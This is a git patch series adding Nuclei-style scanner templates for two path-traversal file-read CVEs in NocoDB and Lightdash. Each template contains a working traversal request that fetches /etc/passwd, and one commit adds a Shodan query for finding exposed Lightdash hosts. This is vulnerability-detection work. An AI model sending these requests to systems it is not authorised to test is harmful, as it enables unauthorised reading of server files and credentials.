From 0133afffc10bab02a3cc4269ea19bca21d6a00e8 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jun 2023 02:23:05 +0700 Subject: [PATCH 1/4] add(http/cves): CVE-2023-35843 & CVE-2023-35844 --- http/cves/2023/CVE-2023-35843.yaml | 39 ++++++++++++++++++++++++++++++ http/cves/2023/CVE-2023-35844.yaml | 32 ++++++++++++++++++++++++ 2 files changed, 71 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35843.yaml create mode 100644 http/cves/2023/CVE-2023-35844.yaml diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml new file mode 100644 index 0000000000..4ccbd30fcb --- /dev/null +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-35843 + +info: + name: NocoDB version <= 0.106.0 Arbitrary File Read + author: dwisiswant0 + severity: high + description: | + NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability + that allows an unauthenticated attacker to access arbitrary files on + the server by manipulating the path parameter of the /download route. + This vulnerability could allow an attacker to access sensitive files + and data on the server, including configuration files, source code, + and other sensitive information. + reference: + - https://advisory.dw1.io/60 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35843 + metadata: + verified: true + tags: cve,cve2023,nocodb,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml new file mode 100644 index 0000000000..33e001886b --- /dev/null +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-35844 + +info: + name: Lightdash version <= 0.510.3 Arbitrary File Read + author: dwisiswant0 + severity: high + description: | + packages/backend/src/routers in Lightdash before 0.510.3 + has insecure file endpoints, e.g., they allow .. directory + traversal and do not ensure that an intended file extension + (.csv or .png) is used. + reference: + - https://advisory.dw1.io/59 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35844 + metadata: + verified: true + tags: cve,cve2023,lightdash,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 8df19650d3087454cddcc99175e9e134b02832d8 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jun 2023 12:52:37 +0700 Subject: [PATCH 2/4] fix(CVE-2023-35843): update title & desc --- http/cves/2023/CVE-2023-35843.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 4ccbd30fcb..e567b96490 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -1,11 +1,11 @@ id: CVE-2023-35843 info: - name: NocoDB version <= 0.106.0 Arbitrary File Read + name: NocoDB version <= 0.106.1 Arbitrary File Read author: dwisiswant0 severity: high description: | - NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability + NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files From 839d1e1af07580f70aa8bb1132673662f4468c79 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jun 2023 18:06:36 +0700 Subject: [PATCH 3/4] fix(CVE-2023-35843): remove unnecessary matcher --- http/cves/2023/CVE-2023-35843.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index e567b96490..fd080187a4 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -29,11 +29,6 @@ http: regex: - "root:[x*]:0:0" - - type: word - part: header - words: - - "application/octet-stream" - - type: status status: - 200 From 0be3f0be0e473a56d30f5cf65358335a04fda848 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jun 2023 18:07:23 +0700 Subject: [PATCH 4/4] fix(CVE-2023-35844): add shodan query metadata --- http/cves/2023/CVE-2023-35844.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 33e001886b..e1fb8d6a68 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -14,6 +14,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-35844 metadata: verified: true + shodan-query: title:"Lightdash" tags: cve,cve2023,lightdash,lfi http: